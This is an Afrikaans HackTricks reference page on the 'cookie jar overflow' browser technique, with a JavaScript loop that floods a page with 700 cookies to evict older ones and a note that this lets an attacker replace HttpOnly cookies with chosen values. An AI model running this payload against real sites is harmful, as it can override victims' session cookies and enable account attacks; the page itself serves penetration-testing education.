Cookie Jar Overflow

Ondersteun HackTricks

Die blaaiers het 'n grens op die aantal koekies wat hulle vir 'n bladsy kan stoor. Dan, as jy om een of ander rede 'n koekie wil laat verdwyn, kan jy die koekiepot oorloop aangesien die oudste eene verwyder sal word voordat:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Let wel, dat derdeparty-kookies wat na 'n ander domein verwys nie oorgeskryf sal word nie.

Hierdie aanval kan ook gebruik word om HttpOnly-kookies te oorgeskryf, aangesien jy dit kan verwyder en dan weer kan instel met die waarde wat jy wil.

Kontroleer dit in hierdie pos met 'n laboratorium.

Ondersteun HackTricks

Last updated